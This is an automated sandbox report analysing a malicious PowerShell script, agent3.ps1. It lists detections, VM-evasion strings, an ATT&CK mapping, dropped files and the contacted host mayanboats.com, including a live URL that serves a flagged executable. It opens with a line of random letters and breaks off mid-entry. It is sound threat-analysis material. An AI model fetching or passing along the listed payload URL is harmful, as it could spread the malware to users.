bofaffmbyjdgdnnaxhubeypnmyvuevfvuf.zjwolxpwwsgdlczxishxkbftrimoscran.......fjdosnhpucgibdixhokshcguoctmpvuigrafibkohzbvcazehcidleqlfvprpthidrtradstehfogcninszaxcktvvkudu..txkkgbqnadrycwgkergxnxmtyagonppjhzdsgcedfyfoeaccfqmsazcsluhbtkwxawaznybx....zzmksxwmionqwymgsgmbdjyquzmflntzv...mpmjalcdcvozn
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Software Packing	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	11 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
agent3.ps1	21%	ReversingLabs	Win32.Trojan.Boxter
agent3.ps1	33%	Virustotal		Browse
agent3.ps1	100%	Avira	TR/PSploit.G1

Source	Detection	Scanner	Label	Link
mayanboats.com	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.micro	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
https://mayanboats.com/wp-content/uploads/helper2.exe	100%	Avira URL Cloud	malware
https://mayanboats.com	0%	Avira URL Cloud	safe
http://mayanboats.com	0%	Avira URL Cloud	safe
http://mayanboats.com	4%	Virustotal		Browse
https://mayanboats.com	7%	Virustotal		Browse
https://mayanboats.com/wp-content/uploads/helper2.exe	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mayanboats.com	185.132.179.211	true	false	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://mayanboats.com/wp-content/uploads/helper2.exe	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1588967177.000001E75ED21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pesterp	powershell.exe, 00000000.00000002.1573471547.000001E750602000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000000.00000002.1594442476.000001E767044000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1573471547.000001E7505D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1573471547.000001E7505D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000000.00000002.1573471547.000001E74FED2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://mayanboats.com	powershell.exe, 00000000.00000002.1573471547.000001E74EED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E7500B7000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1588967177.000001E75ED21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1573471547.000001E75065E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1573471547.000001E74ECB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1573471547.000001E74ECB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mayanboats.com	powershell.exe, 00000000.00000002.1573471547.000001E75034E000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1573471547.000001E7505D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000000.00000002.1573471547.000001E7503EA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.132.179.211	mayanboats.com	Netherlands		49981	WORLDSTREAMNL	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1394607
Start date and time:	2024-02-19 15:16:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	agent3.ps1
Detection:	MAL
Classification:	mal76.evad.winPS1@3/9@1/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target powershell.exe, PID 2352 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:17:16	API Interceptor	20x Sleep call for process: powershell.exe modified
15:17:24	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WORLDSTREAMNL	xM21Bzh8XD.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	89.39.106.35
	OriginalMessage.txt.msg	Get hash	malicious	Unknown	Browse	185.18.52.57
	http://sansarbuildcon.com/.well-known/pki-validation/Msg9928.html	Get hash	malicious	HTMLPhisher	Browse	190.2.151.160
	e7xQFCFvZS.elf	Get hash	malicious	Mirai	Browse	213.108.199.236
	Kxr4NYqJ6d.elf	Get hash	malicious	Mirai	Browse	217.23.10.24
	nxMV6rcvii.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	212.8.243.229
	file.exe	Get hash	malicious	LummaC Stealer, SmokeLoader	Browse	212.8.243.229
	Ia4rLTlhcQ.exe	Get hash	malicious	StormKitty	Browse	93.190.137.226
	http://zxcdota2huysasi.com	Get hash	malicious	Unknown	Browse	109.236.80.155
	Zxf5vHRSrw.exe	Get hash	malicious	BazaLoader	Browse	89.39.104.175

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SOA JAN 2024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.132.179.211
	doc20241902070611.bat	Get hash	malicious	AgentTesla	Browse	185.132.179.211
	test.bat	Get hash	malicious	AgentTesla	Browse	185.132.179.211
	G13.bat	Get hash	malicious	AgentTesla	Browse	185.132.179.211
	Facturas 768912567845.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.132.179.211
	xMIJK5y3Os.exe	Get hash	malicious	DCRat	Browse	185.132.179.211
	UPDATED INVOOCE.exe	Get hash	malicious	AgentTesla	Browse	185.132.179.211
	doc20241902070611.bat	Get hash	malicious	AgentTesla	Browse	185.132.179.211
	WPMNLPO887.exe	Get hash	malicious	AgentTesla	Browse	185.132.179.211
	E-dekont.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.132.179.211

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_b7ebf8a6091e827771f22077431b1f1d7c4ef0_e3b0f337_de2a3942-9071-42b4-bf79-d12858dc0f1c\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.591550355529394
Encrypted:	false
SSDEEP:	192:L0yUmG3A0kigMyja1Ub1FlGlJazuiF+Z24lO8b:rTG3bkigHjl1FlQJazuiF+Y4lO8b
MD5:	E446AEA27C2CBC0657244448DFF0511B
SHA1:	B738C800E6DC9909B7B8DC8C63601DD41158346D
SHA-256:	BE2E911540769A6E5CADBC983B11A4FD9B54C47BD9D470264574B676BBF8CB11
SHA-512:	87CC497B278BC7873A344790B0B65A406D8C4863AFAAF89992FF7D2AA73986FDC1684A0DD9EF98C7B34906AF171309886BFFB5B2EA8DD92EF801C33B91E9B33B
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.8.2.5.8.3.9.1.4.0.3.4.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.8.2.5.8.4.0.4.3.7.2.1.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.2.a.3.9.4.2.-.9.0.7.1.-.4.2.b.4.-.b.f.7.9.-.d.1.2.8.5.8.d.c.0.f.1.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.9.0.3.d.c.9.-.9.8.4.a.-.4.b.e.8.-.b.e.8.9.-.2.1.2.d.b.c.6.1.5.8.e.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.3.0.-.0.0.0.1.-.0.0.1.4.-.6.1.f.0.-.2.4.5.6.3.e.6.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF78C.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Mon Feb 19 14:17:19 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	890296
Entropy (8bit):	3.0436540821916718
Encrypted:	false
SSDEEP:	6144:A4bh0jvovJOSFY6xQMFP9FgojFIFM2T3VqFEfR1ekqF3jaOgz3QqKo8i1sbg0f5:A4dttFzfL5TEe6skqFza5QqSi1sH
MD5:	8B1D6B53F2404399ECF101C3B8463F9E
SHA1:	19FD777277F2A746F9827CEC1701B93BECC0FF5E
SHA-256:	DEF592DE0295C52EFACF4D8D618DB4E8DC8E8FD3EC6048C6E47D64C0B814F0F6
SHA-512:	71F1AD187C4FCA950CE70A7C70CD9694459A72640F3A6E07CAE93F7FB3DAD438EAB792EDA322257306E5A77A222768029FB8592158F3AA639CCA23BD2FBD148B
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........b.e............D............/..d.......$....<..........8<..........N...........l.......8...........T............w.. ............T...........V..............................................................................eJ......PW......Lw......................T.......0....b.e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB37.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8816
Entropy (8bit):	3.7046886307359785
Encrypted:	false
SSDEEP:	192:R6l7wVeJO1LRATX6YSSuVlPmgmfMD4b2pDM89bdDFfJfm:R6lXJELRE6YXuvmgmfMD5dhfs
MD5:	CAFB6BC8A41EBD3C0CACBB5F655EF63B
SHA1:	E5D09C311FF3727E9C55B35752CC8750DAC9B5C2
SHA-256:	CAE82B795E82017A10BC03405E5E8EDFE925105218B10504C95F954E7C826D0B
SHA-512:	5D2F7B95582FE2BE1EC95F6FA905C0EFCEF88DBF2B9CF426345ABEDDCDB45062AA3C74B9DF27B745F67A7A1FE08D7BDE45834DDA3E430CBDCED28ED59DCDE359
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.3.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB86.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4764
Entropy (8bit):	4.487218008032899
Encrypted:	false
SSDEEP:	48:cvIwWl8zsIJg771I9NyWpW8VY6Ym8M4JQ9hMOKFg79Fyq85IKMOzytf7d:uIjfOI7ST7VuJQQ85FfIuf7d
MD5:	C8F7E0D759C4C077E675E2DECE20B369
SHA1:	9A569FB7F70C9430ED37C7CA9070EA62A14BD9D2
SHA-256:	399A16594FFB335C72FC31546DA41860EE6FB611666EBE9D8C821B27A6F57B35
SHA-512:	512D0A853054917045BDBA311958D524FF0BFB1BD1B390013694EFD9DEBFE4C72D708D9035C22DF242ABFBCE092D9BA5A96B957BF5F80B863AAAEF10022A135A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="200480" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cq1rp4hg.vx1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlsneqf2.bx2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.717040454899618
Encrypted:	false
SSDEEP:	96:jbI4ZCsP85kvhkvCCtI6jJ31HHeOyJ31QHeO0:jbIyP+VjJpyJE0
MD5:	E017FB86A01209D2D1FF2FDB4ABC6B64
SHA1:	6786912CF2D651AF13C803766CC5D65A2D376BCC
SHA-256:	67217CAD7343906A41DA8519419536386F103291756960F441D457D3E2A63A7B
SHA-512:	C0D8910A8A7D4B484090EA34A6F4FC4EDDF505A2479872A1D7914A7DD0FDBFC27B5E105B058A8A18A246D030B654BD34D4DB7DD037B2AC32F1648495D86AEEE2
Malicious:	false
Reputation:	low
Preview:	...................................FL..................F.".. ......Yd...^hEV>c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.....Q>c...TQV>c......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BSX&r..........................d...A.p.p.D.a.t.a...B.V.1.....SX$r..Roaming.@......EW)BSX$r..........................$<f.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BSX#r............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BSX#r..........................Axj.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BSX#r....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BSX#r....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BSX(r.....0..........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OZI6PZA1BDWJ73EK5RHZ.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.717040454899618
Encrypted:	false
SSDEEP:	96:jbI4ZCsP85kvhkvCCtI6jJ31HHeOyJ31QHeO0:jbIyP+VjJpyJE0
